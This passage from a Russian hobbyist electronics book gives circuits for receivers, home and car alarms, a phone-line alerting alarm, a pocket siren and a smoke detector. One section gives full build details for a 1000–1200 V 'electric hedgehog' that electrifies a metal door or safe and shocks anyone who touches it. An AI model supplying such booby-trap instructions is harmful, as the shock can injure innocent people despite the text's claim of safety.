При монтаже использованы постоянные резисторы типа С2-23, подстроечный R18 типа СПЗ-19а, конденсаторы типа К10-17 и КМ-4, полярные С9, С12...С14, С20 типа К50-35 на 22 В. Пьезоизлучатель ЗГИ 8 можно заменить на ЗП-25. Диоды КД521 заменяются любыми импульсными.
Катушки L1 и L3 выполнены на каркасе диаметром 5 мм проводом ПЭВ-2 диаметром 0,23 мм (конструкция показана на рис. 2.64) и содержат по 14 витков. Катушка L2 имеет конструкцию для горизонтальной установки на плате, рис. 2.55. Она содержит в обмотках: 1—12 витков, 2—3 витка над первичной обмоткой, проводом диаметром 0,4 мм. Для настройки используется любой
высокочастотный ферритовый сердечник.
Конструкция катушек контуров промежуточной частоты L4...L6 показана на рис. 2.17. Они могут использоваться уже готовые, от миниатюрных радиоприемников, или — при наличии всех входящих узлов — выполняются самостоятельно проводом ПЭЛ диаметром 0,1 мм и содержат по 80 витков.
Для изготовления катушки фильтра L7 использованы две броневые ферритовые (600...2000НМ) чашки типоразмера Б14 (без подстроечного сердечника). Обмотка наматывается проводом ПЭЛ диаметром 0,08 мм до заполнения диэлектрического каркаса и располагается внутри ферритовых чашек. Резонансная частота контура L7-C27 (1000 Гц) может отличаться от указанной. В этом случае потребуется в передатчике при настройке установить такую же частоту модуляции.
Настройку приемника начинаем с дешифратора при питании схемы на пряжением 7,5 В. Подавая синусоидальный сигнал с НЧ генератора (15...20 мВ) на вход дешифратора, резисторами R13 и R18 добиваемся симметричного ограничения сигнала на резисторе R19 при изменении питающего напряжения.
Рис. 2.78. Дешифратор приемника
Рис. 2.79. а) Топология печатной платы приемника
Рис. 2.79. б) Расположение элементов
После этого определяем резонансную частоту фильтра (измеряем ее).
Налаживание высокочастотной части приемника сводится в основном к настройке контуров при помощи ферритовых сердечников. Для чего потребуется высокочастотный генератор.
Приемник должен сохранять работоспособность при изменении напряже ния в диапазоне 6,6...9 В.
Потребляемый схемой ток составляет не более 12 мА. В случае использования для питания приемника шести аккумуляторов типа Д-0.26Д непрерывная автономная работа может составить 20 часов.
Конструкция корпуса приемника аналогична показанной для электрошокового устройства. Элементы питания размещаются в склеенных из картона стаканах. Вторая печатная плата крепится на боковых стенках из оргстекла толщиной 4...5 мм (эта же плата обеспечивает электрическое соединение между аккумуляторами). Образованный из двух плат каркас оборачивается картоном и проклеивается (он должен легко сниматься). После этого придать приятный вид корпусу поможет декоративная пленка под цвет дерева (удобнее, если она будет самоклеящаяся).
ОХРАНА КВАРТИРЫ С ОПОВЕЩЕНИЕМ ПО ТЕЛЕФОННОЙ ЛИНИИ
Устройство подключается к телефонной линии параллельно с телефонным аппаратом или по схеме подключения параллельного телефона и предназначено для охраны квартиры от проникновения через окна или двери, в зависимости от места установки датчиков F1...Fn.
При срабатывании датчика сигнализации производится оповещение по телефонной линии соседей или родственников условным сигналом, а также включает на 3 минуты сирену или звонок. При необходимости номер оповещаемого абонента можно легко заменить, переставив перемычки в наборном поле.
По сравнению с аналогичными функциями в телефонах с АОН (последних версий, типа "Русь" или "Вега") данное устройство имеет меньшую стоимость, не содержит импортной комплектации, проще в настройке и более надежно в эксплуатации, а также является энергонезависимым от сети 220 В.
Рис. 3.1
Электрическая схема устройства собрана на легкодоступных восьми микросхемах «МОП серии (рис. 3.1), и состоит из основных узлов:
формирователя импульсного набора телефонного номера на элементах D4.1...D4.3, D5, D7.1; наборного поля, где устанавливается методом накрутки на контактные штыри семи перемычек (для задания до семи цифр фиксированного номера оповещения); преобразователя десятичного числа в двоичный код на диодах VD11...VD23; формирователя временных интервалов для работы всего устройства на элементах D8, D6, D4.4, D7.2; детектора срабатывания охранного датчика на D1.1...D1.3, D2.1, D2.2; генератора тональной частоты D3.2, D3.4 и управляющего каскада на D3.1, VT1...VT3.
Светодиод HL1 позволяет контролировать работу всего устройства охраны. Он загорается при занятии телефонной линии в режиме срабатывания сигнализации и мигает с частотой 10 Гц при наборе номера в линию. Набор в телефонную линию номера выполняют транзисторы VT1, VT2, на управление которыми приходит последовательность импульсов с элемента D4.3 (управляемого генератора). Генератор работает совместно со счетчиком D5, в регистр начальной установки которого последовательно записываются двоичные коды установленных перемычками цифр телефонного номера. Счетчик D5 начинает работать на вычитание до момента времени, пока на всех его выходах не установится логический "О". Логический "О" тогда установится и на выходе D4.3 (вывод D4/10).
Для включения в квартире звонка или сирены используется оптронная пара АОУ103В (VD9) и тиристор КУ202Н, М, К, Л (VS1), что обеспечивает электрическую развязку телефонной линии от сети 220 В. Устройство охраны может питаться от любых батареек или аккумуляторов с напряжением от 4,5 до 15 В и потребляет в ждущем режиме микроток (меньше, чем ток саморазряда элементов питания). При желании схему можно дополнить устройством автоматического подзаряда аккумуляторов от телефонной линии при срабатывании режима охраны (рис. 3.2).
Рис. 3.2
Все детали конструкции, кроме элементов питания, размещаются на двухсторонней печатной плате с размерами 178х85 мм (рис. 3.3 и 3.4). Применяемые в схеме резисторы и конденсаторы могут быть любого типа, малогабаритные (полярные конденсаторы применены типа К50-16), микросхемы 561-ой серии можно заменить на 1561-ую (или 564-ую серию при разработке собственной топологии печатной платы). Диоды VD8 и VD10...VD23 могут быть заменены на Д2, Д9 или любые импульсные (КД521). Диоды VD1 и VD3...VD7 высоковольтные, типа КД257Д, В, Г или КД258Д, В, Г.
Рис. 3.3. Топология печатной платы
Светодиод HL1 подойдет любого типа и цвета. Разъем Х1 — типа ОНЦ-КГ-4-5 для установки на печатную плату. Гнезда Х4 и Х5 типа Г4,0.
Корпус устройства удобно выполнять из двух металлических пластин, загнутых буквой П, на одной из которых крепится плата с радиодеталями, а вторая является крышкой. Над печатной платой с элементами на пластине закрепляются 4 или 5 аккумуляторов Д-0,26.
При настройке устройства, из-за разброса номиналов конденсаторов, может потребоваться подбор резисторов, отмеченных на схеме "*", чтобы получить необходимые временные интервалы.
Для обеспечения нормальной работы приборов АТС, частота импуль сов, создаваемых номеронабирателем, должна находиться в пределах 10±1 имп/с (зависит от R15). При этом форма импульсов на выходе микросхемы D3.1 приведена на рис. 3.5.
Импульсный коэффициент K=tp/t3 должен составлять 1,4...1,8, что легко проконтролировать осциллографом при наборе цифр 0-0-0. Межсерийное время должно быть не менее 0,5 секунд (зависит от номинала элементов С7, R14).
Для настройки устройства через разъем Х1 вместо телефонной линии подключаем блок питания с напряжением 12 В и осциллографом контролируем изменения уровней сигналов в соответствии с логикой работы устройства.
Для удобства проверки правильной работы узла набора номера мож но временно раз в пять увеличить номиналы емкостей С7 и С8. При этом легко сосчитать количество моргании светодиода при наборе каждой цифры номера — оно должно соответствовать установленным в наборном поле перемычкам.
В последнюю очередь подключается сеть 220 В и звонок.
В качестве датчика F1 удобно использовать геркон с нормально разомкнутыми контактами и магнит (когда дверь закрыта, контакты должны замыкаться магнитным полем). Соединяется датчик F1 с основным блоком перевитыми между собой проводами (для снижения внешних наводок). Магнит крепится к подвижной части двери, а геркон на каркасе (см. рис. 3.25).
Размещается блок охраны в скрытом месте и при первоначальном подключении к телефонной линии нужно соблюдать полярность, указанную на схеме, что легко проконтролировать по свечению светодиода HL1. При правильной полярности подключения блока к ТЛ, когда сработает сигнализация (через 20...25 секунд после первоначального включения устройства в режим ОХРАНА), начинает светиться индикатор. Если этого не произошло, то нужно поменять местами провода в месте подключения устройства к телефонной линии.
Для установки блока сигнализации в режим ОХРАНА необходимо нажать кнопку S1 (с фиксацией, например типа П2К) на корпусе и через 20...25 секунд режим включится (интервал задается номиналом R1). За это время после нажатия кнопки необходимо покинуть помещение и закрыть за собой дверь (датчики F1...Fn будут замкнуты).
Для снятия с режима ОХРАНА при проникновении в квартиру нужно не позднее чем через 20 секунд нажать кнопку S1 (время устанавливают резистором R7). Если этого не сделать, то включится звонок и сформируется сигнал набора номера в телефонную линию.
Рис. 3.4. Расположение элементов на плате
После однократного срабатывания сигнализации через 3 минуты она отключается из режима ОХРАНА и будет находиться в этом состоянии независимо от срабатывания датчиков до момента повторного включения устройства в режим ОХРАНА кнопкой S1.
Рис. 3.5. Форма импульсов в режиме набора номера 3-4 на выводе 4 микросхемы D3:
tp - время размыкания линии;
t3 - время замыкания линии
Когда вы вошли в квартиру при работающей сигнализации, должен светиться светодиод до момента ее выключения кнопкой S1 (или автоматического — по истечении 3 минут). Если свечения нет, это говорит о том, что сигнализация срабатывала за время вашего отсутствия (случайно срабатывать она не может).
Приведенная схема показала себя надежной в работе и удобной в эксплуатации. В заключение, исходя из опыта использования системы,
можно отметить, что включатель S1 лучше применить с дополнительной группой контактов, которую следует использовать для отключения от сети 220 В цепей звукового сигнала, когда схема охраны отключена. Это защитит тиристор от сетевых помех и повысит надежность схемы.
Полезным будет также дополнение схемы звуковым индикатором состояния элементов питания (контроль их разряда), например, приведенной в разделе 5. Это позволит вам быть уверенным в надежности работы схемы охраны и вовремя подзарядить или сменить элементы питания.
ПРОСТЫЕ ОХРАННЫЕ УСТРОЙСТВА ДЛЯ КВАРТИРЫ И ДАЧИ
В настоящее время промышленность пока еще мало выпускает охранных устройств для квартир, да и цена у них не всегда соответствует параметрам. Публикуемые в различных журналах схемы рассчитаны, как правило, на опытных радиолюбителей, и их не каждый сможет повторить.
Предлагаемые две схемы отличаются от всех ранее опубликованных своей простотой и надежностью, что проверено при эксплуатации в течение более 10 лет.
В основу построения схемы (рис. 3.6) взято использование реле времени К2 типа РВП72-3-221-ООУ4, имеющее две группы контактов, одна из которых — К2.1 — срабатывает мгновенно, а вторая — К2.2 — с регулируемой (0,4...180 секунд) задержкой. Задержка устанавливается на 6...8 секунд для того, чтобы при входе в квартиру хозяин успел отключить сигнализацию (скрытно установленной кнопкой S3) до срабатывания звукового сигнала. Полное отключение сигнализации от сети выполняют тумб- лером S1 (типа Т1 или T3). Сигнальным датчиком положения двери является кнопка S4 (типа КМ2-1 или аналогичная малогабаритная), установленная на каркасе двери. Кнопка S2 устанавливается перед дверью в квартиру (можно вблизи от кнопки звонка), и она позволяет переключать сигнализацию в режим ОХРАНА после выхода из квартиры. Реле К1 можно использовать любого типа с рабочим напряжением 220 В.
В режиме ОХРАНА схема не потребляет электроэнергию, но при срабатывании сигнализации сирена (или звонок) будет звучать до момента выключения сигнализации кнопкой S3 или тумблером S1 внутри квартиры.
Рис. 3.6. Электрическая схема устройства охраны квартиры:
S1 — включение сигнализации тумблер (Т1 или ТЗ);
S2 — кнопка включения режима "Охрана";
S3 — кнопка отключения режима "Охрана";
S4 — кнопка сигнального контакта охраны, установленного на входной двери (датчик)
Такую сигнализацию нельзя устанавливать на даче или в месте, где приходится бывать очень редко. Чтобы устранить этот недостаток, схему мож но дополнить еще одним реле времени КЗ, налогичным К2 (показано на схеме пунктиром). Время срабатывания контактов КЗ.1 устанавливается на задержку 180 сек кунд. Через этот интервал схема отключит сирену и будет находиться в таком состоянии до включения режима ОХРАНА.
Рис. 3.7. Электрическая схема устройства охраны дачи или гаража:
S1 —тумблер включения сигнализации;
S2 — тумблер используется для временного отключения звонка (или сирены) во время контроля работы устройства охраны
Вторая схема, приведенная на рис. 3.7, имеет ограниченное время звучания сигнала (не более 180 секунд) и выполнена только на одном реле времени.
В ждущий режим ОХРАНА схема перейдет после кратковременного обесточивания схемы, после срабатывания или же при первоначальном включении.
Применение в схе ме тиристора VS1 необходимо для пожарной и электрической безопасности (при этом на цепи охранных датчиков не будет опасного для жизни напряжения). Схема позволяет в цепь охраны последовательно подключать много датчиков. На стекла окон устанавливается датчик в виде приклеенной по периметру полоски из металлической фольги. Такие датчики используются и на некоторых промышленных объектах и срабатывают при разбивании стекла.
При разрыве цепи охраны включится реле К2 (такое же, как и на схеме, приведенной на рис. 3.7) и своими контактами К2.1 самоблокируется. Также начнет работать реле К1, которое отключится через 180 секунд контактами К2.2.
Реле К1 позволяет включать мощную нагрузку. В качестве источника звука можно использовать сирену СС-1 или любой сильный звонок.
При замене тиристора на другой тип (КУ201Л) может потребоваться подбор R1. Резистор R1 выбирают типа ПЭВ-10 или аналогичный с допустимой мощностью 7...10 Вт (можно составить из нескольких последовательно соединенных резисторов).
Лампочка HL2 и тумблер S2 являются вспомогательными и их применение не обязательно.
Общим недостатком приведенных схем является зависимость системы охраны от сети 220 В, но, учитывая малую вероятность обесточивания схемы именно в момент ограбления, они могут достаточно надежно охранять объекты.
УНИВЕРСАЛЬНОЕ ОХРАННОЕ УСТРОЙСТВО
Это устройство является многофункциональным и может использоваться для охраны автомобиля (рис. 3.8), квартиры (рис. 3.9) или гаража. При срабатывании сигнализации включается звуковой сигнал. Устройство имеет встроенный источник питания и в аварийной ситуации является энергонезависимым. Вся схема устройства вместе со звуковым сигналом выполнены в одном корпусе.
Рис. 3.8. Подключение системы охраны к автомобилю
При охране автомобиля устройство работает с двумя типами внешних датчиков: а) для дверей (датчики открывания дверей или датчик механических колебаний, см. статью "Датчики для охранной сигнализации") — включает звуковой сигнал с задержкой 6 секунд; б) для закрытого капота и багажника — мгновенное включение звукового сигнала.
Владелец автосторожа при срабатывании сигнализации по звуку легко может определить группу датчиков, сработавших во время охраны.
Схема автосторожа обеспечивает после включения охраны задержку 12±2 секунд для выхода из машины и 6±1 секунд при входе в автомобиль для отключения сигнализации скрытно установленным тумблером S1 до срабатывания звукового сигнала.
Рис. 3.9. Подключение системы охраны в квартире
Схема подключения автосторожа (см. рис. 3.8) обеспечивает блокировку системы зажигания (второй парой контактов тумблера S1) на все время охраны вне зависимости от срабатывания датчиков.
В охранном устройстве предусмотрена светодиодная индикация режима срабатывания датчиков сигнализации, что удобно при установке и эксплуатации, так как является индикатором нормальной работы всей схемы.
Устройство питается от аккумулятора автомобиля, но в случае аварийной ситуации (при его отключении) схема автоматически переключается на встроенный резервный источник питания, при этом потребляемый ток в режиме ОХРАНА не превышает 0,5 мА.
При охране квартиры или гаража электропитание устройства осуществляется от встроенного источника питания, которым является блок из шести элементов А316 или аккумуляторов НКГЦ-0,45, при этом ток потребления в режиме ОХРАНА не превышает 0,5 мА и элементы питания обеспечат работу устройства в режиме ОХРАНА не менее одного года (если не срабатывал звуковой сигнал).
Работает устройство с двумя линиями от датчиков:
а) датчик двери — включает звуковой сигнал с задержкой 6 секунд;
б) датчик закрытого окна или вторых дверей — включение звукового сигнала мгновенно.
Схема сторожа обеспечивает после включения режима охраны за держку в 12 секунд для выхода из квартиры и 6 секунд при входе — для отключения сигнализации до срабатывания звукового сигнала.
В схеме сигнализации имеется светодиодная индикация режима срабатывания датчиков, что является показателем работы.
Электрическая схема (рис. 3.10) собрана на четырех микросхемах КМОП серии, что обеспечивает малое потребление тока, и состоит из триггера на элементах D1.1...D1.3, генератора на частоту около 500 Гц — D2.2 и D2.3, счетчика тактовой частоты D3 и схемы селекции временных интервалов на микросхеме D4. Транзисторы VT1 и VT2 позволяют усилить ток в нагрузке, которой является внутренний малогабаритный динамик (ЗГДШ-14-4), а также может подключаться внешний источник сигнала — гудок автомобиля.
В момент включения питания схемы на выходах счетчика D3 устанавливается (цепью СЗ, R4) лог. "0". Это обеспечивает появление лог. "1" на выводе D4/10 и лог. "0" на D1/3. При этом будет работать автогенератор и связанный с ним счетчик до момента времени, пока на выводе D3/2 не появится "1". Если ни один из датчиков не сработал, то через 12 секунд появится лог. "1" на выводе D1/3 — генератор остановится. С этого момента устройство будет находиться в режиме ОХРАНА, и срабатывание датчиков приведет к переключению триггера на элементах D1.1...D1.3 (на выводе D1/4 появится лог. "1", а на выводе D1/3 — "0"), что приведет к продолжению работы генератора и счетчика, а на выходной нагрузке через 6 секунд появится звуковой сигнал.
Рис. 3.10
Применяемые резисторы и конденсаторы можно использовать любого типа. Все элементы схемы, кроме светодиода HL1, тумблера S1, динамика ВА1, резистора R5, элементов питания и датчиков, размещены на односторонней печатной плате размером 110х45 мм (рис. 3.11). При этом потребуется сделать шесть объемных перемычек (если использовать двухстороннюю печатную плату, то эти перемычки удобно выполнить печатными проводниками).
Транзистор VT1 крепится к теплорассеивающей пластине (радиатору). В качестве переключателя S1 применен тумблер ТЗ или любой аналогичный с двумя переключающими контактами.
При правильной сборке и исправных деталях схема не требует настройки. Общие габариты всего устройства, при использовании малогабаритного источника звука, не превышают 140х120х60 мм .
Особенностью приводимой схемы является отсутствие электролитических конденсаторов, что позволяет повысить ее надежность и расширить диапазон рабочих температур для устройства охраны.
Рис. 3.11. Топология печатной платы и расположение элементов
Приведенную охранную сигнализацию можно легко усовершенствовать, дополнив ее рядом полезных функций:
— ограничение времени звучания (4...5 минут) сигнала в случае постоянного нарушения охранного шлейфа;
— при включении блока охраны скрытно установленным тумблером SA1; если датчик F1 будет находиться в положении, показанном на схеме, то независимо от состояния других датчиков устройство будет ждать, пока он сработает (например при выходе из помещения), после чего начнется отсчет времени задержки (12 секунд) включения режима ОХРАНА (индикатором начала отсчета времени является мигание зеленым цветом светодиода HL1);
— при входе в помещение необходимо в течение 6 секунд отключить сигнализацию до срабатывания звукового сигнала оповещения, а чтобы вы не забыли, что помещение находилось под охраной, в течение этого интервала времени пьезоизлучатель HF1 будет издавать прерывистый звуковой сигнал небольшой громкости.
Рис. 3.12. Усовершенствованная схема охранной сигнализации
Для выполнения всех этих функций в схему (рис. 3.12) добавлены узлы: ограничителя времени звучания звукового сигнала на счетчике D5; триггера на элементах D6 для обеспечения режима ожидания начала отсчета временного интервала 12 секунд. Светодиод HL1 и пьезоизлучатель HF1 позволяют более полно контролировать режимы работы устройства, что удобно при эксплуатации.
В начальный момент включения питания схемы (А1) импульс, сформированный цепью C4-R5, обеспечивает обнуление счетчика D5 (на выходе D5/7 появится логическая "1", т. е. напряжение питания). При этом на выводах элементов схемы будут состояния: D6/10 — лог. "1"; D1/1 — "0"; D1/2 — "0"; D1/3 ~ "1"; D7/1 — "О"; D7/13 — "0".
После срабатывания датчика F1 на выводе D6/9 появится лог. "1" (D6/10 — "О"), что приведет к появлению на выходе D1/3 лог. "О". Начнет работать генератор и связанный с ним счетчик D3, до момента времени (12 секунд), пока на D4/10 не появится лог. "О" (на D1/3 —лог. "1", что остановит работу генератора). При этом схема переходит в режим ОХРАНА и будет находиться в таком состоянии, пока не сработает любой датчик.
Если сработает один из датчиков F1 или F2 (когда схема находится в режиме ОХРАНА), это приведет к переключению триггера на элементах D1.1...D1.3 (на выводе D1/4 появится лог. "1", а на выводе D1/3 — "О"), что включит работу генератора и счетчика D3. В этом случае через 6 секунд появится звуковой сигнал оповещения (ВА1). За этот интервал времени необходимо отключить блок охраны, что, не зная места расположения тумблера SA1, сделать постороннему невозможно.
При срабатывании датчика F3 звуковой сигнал появится без задержки.
Когда блок охраны работает в режиме ОПОВЕЩЕНИЕ, кроме звукового сигнала, будет красным цветом светиться индикатор HL1. Сдвоенный светодиод HL1 можно заменить двумя любыми обычными светодиодами с разным цветом свечения.
Для того чтобы снизить ток потребления схемой при работе светодиода в режиме индикации, напряжение на него подается импульсами. Из-за инерции зрения это незаметно.
Рис. 3.13. Блок питания
В стационарных условиях лучше, если устройство будет иметь смешанное питание — от сети и аккумулятора. При этом, основным является сетевой источник, а в аварийной ситуации (при отключении сети) автоматически подается резервное питание от аккумулятора (рис. 3.13).
В качестве датчиков F1...F3 для сигнализации удобно использовать герконовые контакты, например КЭМ-1, совместно с магнитом. Они малогабаритны и имеют высокую надежность. Чаще всего бывает достаточно всего одного датчика (F1) на входной двери.
В случае кратковременного срабатывания датчиков схема из режима ОПОВЕЩЕНИЕ автоматически возвращается в режим ОХРАНА. Длительность звучания сигнала оповещения зависит от того, какой датчик сработал, и по звуку можно легко определить группу сработавших датчиков.
Применяемые резисторы, конденсаторы и пьезоизлучатель (HF1) по дойдут любого типа, малогабаритные. Вместо транзисторов КТ3102 можно применить КТ315Г(Е), КТ3107 заменяется на КТ361Г(Е). Транзистор VT5 и стабилизатор DA1 крепятся на теплорассеивающих пластинах.
В качестве диодов VD1...VD4 подойдут любые импульсные, VD5... VD11 заменяются на КД213А или аналогичные.
Для сетевого блока питания трансформатор Т1 можно использовать с напряжением во вторичной обмотке 12...16 В и мощностью не менее 15 Вт. Так, например, подойдут унифицированные трансформаторы типа: ТПП266- 220-50, ТПП276-220-50, ТПП286-220-50. В этом случае, при монтаже, сохраняется нумерация выводов, указанная на схеме (рис. 3.13).
Блок охраны размещается в скрытом месте, а соединения с датчиками лучше выполнять перевитыми между собой проводами, что исключит влияние внешних наводимых помех.
При правильной сборке и исправных деталях схема начинает работать сразу и настройки, как правило, не требует.
При необходимости временные интервалы 6 и 12 секунд можно одновременно изменить подбором номинала резистора R4. Резистор R13 позволяет ограничить мощность звука в динамике.
ОХРАННАЯ СИГНАЛИЗАЦИЯ ДЛЯ ФЕРМЕРА
Когда я столкнулся с необходимостью изготовления такого устройства, то, изучив целую стопку литературы, пришел к выводу, что ни одна из ранее опубликованных схем для этих целей полностью не подходит. Поэтому и пришлось заняться изготовлением собственной системы, которая бы обладала простотой, надежностью и при этом обеспечивала охрану по одному охранному шлейфу нескольких удаленных на расстояние до 100 м друг от друга объектов. Это устройство может применяться для охраны дачи или садового участка.
Электрическая схема блока охраны приведена на рис. 3.14. Она обеспечивает индикацию места сработавшего датчика — одного из четырех, что повышает удобство при ее установке и использовании. Определить место можно и по характеру звука подключенной сирены или звонка.
Схема чувствительна к любым нарушениям в цепи охранного шлейфа (разрыв или замыкание) и позволяет значительно упростить подключение объектов охраны (см. рис. 3.15).
Рис. 3.14. Электрическая схема блока охраны для подключения удаленных датчиков
Рис.3.15
Принцип работы блока охраны основан на контроле уровня напряжения при протекании небольшого тока через охранный шлейф (от сработавших датчиков он изменяется).
Схема собрана на легко доступных элементах и состоит из источника сетевого питания на трансформаторе Т1 и диодах VD3...VD6, стабилизатора напряжения на микросхеме D5 (КР142ЕН8Б или 142ЕН8Б), схемы контроля уровня напряжения на охранном шлейфе (VT2...VT6) и формирователя временных интервалов на микросхемах D1...D4.
Схема формирователя временных интервалов по принципу работы аналогична с приведенной на рис. 3.10 и имеет незначительные отличия, связанные с применением реле К1 для включения мощной нагрузки (звонка или сирены, света), а также светодиодной индикацией типа сработавшего датчика.
При включении блока охраны (включателем SA1) схема обеспечивает задержку установки режима ОХРАНА на 12 секунд для того, чтобы хозяин успел покинуть помещение.
При входе в дом сработает датчик F5, и в течение 6 секунд необходимо успеть отключить сигнализацию до момента появления звукового оповещения.
Вся схема в режиме ОХРАНА потребляет по цепи +25 В ток не более 10 мА, и при безошибочной сборке настройка ее заключается в установке резистором R12 (многооборотный, типа СП5-2) лог. "1" на коллекторе VT4, а при срабатывании датчиков F2 или F3 должен появиться лог. "О".
Реле К2 должно срабатывать только при коротком замыкании охранного шлейфа (сработал датчик F4).
Таблица 3.1
Состояние охранного шлейфа |
сработавший датчик |
Свечение свето- диодов в блоке охраны |
Контрольные точки схемы |
Выходной сигнал на включение реле К1 |
||||
HL1 |
HL2 |
HL3 |
а |
b |
с |
|||
режим "ОХРАНА" |
- |
нет |
нет |
нет |
1 |
1 |
1 |
нет |
разрыв шлейфа |
F1 |
есть |
есть |
нет |
1 |
0 |
1 |
прерыв. вкл. реле чередуется с непрер. |
замыкание датчика |
F2 или F3 |
нет |
нет |
нет |
0 |
1 |
0 |
продолжительное вкл. чередуется с паузами |
замыкание датчика |
F5 |
есть |
нет |
нет |
0 |
1 |
1 |
продолжительное вкл. чередуется с паузами |
замыкание шлейфа |
F4 |
нет |
нет |
есть |
0 |
0 |
0 |
непрерывное включение |
Для удобства настройки схемы приведена таблица 3.1, которая позволяет понять логику работы схемы и индикации сработавшего датчика.
При изготовлении схемы применены конденсаторы С1, СЗ, С4, С6 типа К10-17а; С2, С5 — К50-35А на 50 В. Вместо транзисторов VT3, VT5, VT6 можно использовать транзисторную матрицу 1НТ251. Реле К1 типа РЭН34 ХП4.500.000-01; К2 — РЭС55А РС4.569.602 (или РС4.569.607) или РЭС55Б РС4.569.627 (РС4.569.632) на рабочее напряжение 12 В.
Трансформатор Т1 можно использовать любой с напряжением во вторичной обмотке 18...25 В. Такое напряжение есть во многих трансформаторах от бытовой радиоаппаратуры. Так, например, подойдут многие из унифицированных трансформаторов типа: ТПП221...ТПП226, ТПП231...ТПП236, ТПП245...ТПП248, ТПП251...ТПП262 и другие. Они имеют много вторичных обмоток с разными напряжениями, и последовательное их включение позволит получить нужное.
В качестве датчиков F1...F5 лучше использовать герконовые контакты совместно с магнитами, так как они герметичны и не боятся атмосферных воздействий.
Применение включателя SA2 не является обязательным, но его наличие делает удобным (бесшумным) проверку работы блока охраны при эксплуатации.
ЭЛЕКТРИЧЕСКИЙ "ЕЖИК"
Устройство предназначено для активной защиты металлической двери квартиры или сейфа и может быть. применено совместно с другими охранными устройствами как дополнительное, включаемое в случае тревоги. Оно может пригодиться также и в сельском хозяйстве для создания электрического ограждения огорода от животных (для этого достаточно установить по периметру колья с натянутыми двумя оголенными проводами).
Рис. 3.16. Электрическая схема "ЕЖИКА"
Схема устройства (рис. 3.16) состоит из автогенератора на транзисторе VT1 и трансформаторе Т1, с высоковольтной обмотки которого после выпрямления на диодах VD3...VD5 снимается напряжение 1000...1200 В. Это позволяет при прикосновении к любому из высоковольтных выводов получить удар током, сила которого будет зависеть от общей емкости конденсаторов С5 и С6 (энергия запасенного заряда на емкости:
Uc — напряжение на конденсаторе в вольтах, С — суммарная емкость в фарадах), а их величина выбрана такой, чтобы этот удар не представлял опасности для жизни, однако второй раз его получать уже не захотелось.
Для изготовления электрического "ЕЖИКА" потребуется намотать трансформатор Т1 на диэлектрическом каркасе, вставляемом в броневой сердечник БЗО (см. рис. 3.17) из феррита М2000НМ1 (М1500НМ1). Трансформатор содержит в обмотке 1 — 9 витков, 2 — 10 витков провода ПЭЛШО-0,18, в обмотке 3 — 1800 витков провода ПЭЛ-0,1. Его изготовление требует аккуратности, и при намотке 3-й обмотки необходимо через каждые 400 витков укладывать конденсаторную диэлектрическую бумагу (ее можно достать из высоковольного конденсатора), а слои пропитать конденсаторным или трансформаторным маслом. После намотки катушки вставляем ее в ферритовые чашки и склеиваем (предварительно убедившись, что она работает). Места выводов катушки заливаются разогретым парафином.
Рис. 3.17. Составные части конструкции броневой катушки
При сборке схемы необходимо соблюдать полярность фаз обмоток трансформатора, указанную на схеме.
Топология печатной платы и расположение на ней элементов (кроме предохранителя) приведены на рис. 3.18. Трансформатор крепится к плате клеем.
Питается схема от аккумулятора или любого источника с напряжением 10...15 В.
При правильном включении фаз обмоток Т1 схема начинает работать сразу. Настройка заключается в подборе конденсатора С2 — по максимуму выходного напряжения на клеммах ХЗ и Х4, а также в подборе режима работы автогенератора резистором R2 для получения минимального тока потребления
при устойчивом самовозбуждении (запуске автогенератора в момент включения питания).
Обычно потребляемый схемой ток не превышает 50 мА. Для того чтобы повысить экономичность устройства, можно его дополнить таймером (рис. 3.19), включаемым между источником питания и схемой. Таймер позволяет при подаче на схему напряжения включать "ЕЖИК" на 5...15 секунд (время зависит от величины номинала конденсатора С10 и резистора R5), после чего он ее обесточивает до момента повторного включения питания.
Рис. 3.18. Топология печатной платы и расположение элементов
Рис. 3.19. Электрическая схема таймера
В схемах применены конденсаторы С1, С7, С10 типа К53-4; С2, СЗ, С4, С8, С9 — К73-9 на 100 В ; С5, С6 — К42У-2 или К73-16В на 1600 В.
КАРМАННАЯ СИРЕНА
Это устройство предназначено для тех, кто беспокоится о своей безопасности. Оно может быть полезно детям, женщинам и позволяет владельцу привлечь к себе внимание окружающих людей для оказания необходимой помощи. Схема может также применяться в составе охранной сигнализации как дополнительный звуковой сигнализатор.
Рис. 3.20. Электрическая схема сирены
Устройство легко размещается в любом кармане и при его включении создает плавно меняющийся звуковой сигнал, похожий на звук милицейской сирены. Громкости сигнала достаточно, чтобы привлечь внимание окружающих людей в радиусе более 50 метров.
Схема устройства приведена на рис. 3.20. Она состоит из двух связанных генераторов на микросхеме D1. Частота генератора на элементах D1.4, D1.6 меняется полевым транзистором VT1, которым управляет генератор (D1.1, D1.2) с более низкой рабочей частотой.
В качестве источника звука используется пьезоизлучатель ЗГИ, ЗП-22 или аналогичный. Для повышения громкости звука излучатель включен к трансформатору Т1. Его можно взять от малогабаритного радиоприемника, используя обмотку с большим числом витков в качестве вторичной, а первичную (или ее часть) подключить по схеме автотрансформатора, как это показано на рисунке.
Такое включение HF1 позволяет получать на нем переменное напряжение более 100 В, что значительно повышает громкость звука. Используется микропереключатель S1 типа ПД-9-2 или любой малогабаритный.
Топологию печатной платы можно использовать (с небольшими изменениями) от схемы имитатора голосов птиц (см. раздел 6, рис. 6.1).
Конструкция корпуса может быть любой, но единственное требование, которому он должен удовлетворять, — это механическая прочность (выдерживать удар при падении устройства).
ДАТЧИК ДЫМА ДЛЯ СИГНАЛИЗАЦИИ О ПОЖАРЕ
От пожара ущерб может быть еще больше, чем от воров, а вовремя поданный сигнал тревоги позволит хоть что-то спасти.
Рис. 3.21. Электрическая схема датчика дыма
На промышленных объектах в основном используются для сигнализации о пожаре тепловые датчики (они наиболее дешевы). Особенность их устройства такова, что они подают сигнал тревоги, когда охраняемое помещение уже сгорело.
Наиболее надежны, по мнению пожарных, считаются датчики, срабатывающие на дым, однако они далеко не всем по карману.
Один из вариантов выполнения датчика дыма приведен на рис. 3.21. Cхема состоит из генератора (на элементах микросхемы DD1.1, DD1.2, С1, R1, R2), формирователя коротких импульсов (на DD1.3 и С2, R3), усилителя
Рис. 3.22. Вид конструкции датчика
(VT1) и излучателя (HL1) ИК-импульсов, а также компаратора (DD2) и ключа на транзисторе (VT2). При приеме ИК-импульсов фотодиодом HL2 срабатывает компаратор и своим выходом разряжает конденсатор С4. Как только прохождение импульсов нарушится, конденсатор зарядится через резистор R9 в течение 1 секунды до напряжения питания, и начнет работать элемент D1.4. Он пропускает импульсы генератора на коммутатор тока VT2. Применение светодиода HL3 не является необходимым, но при его наличии удобно контролировать момент срабатывания датчика.
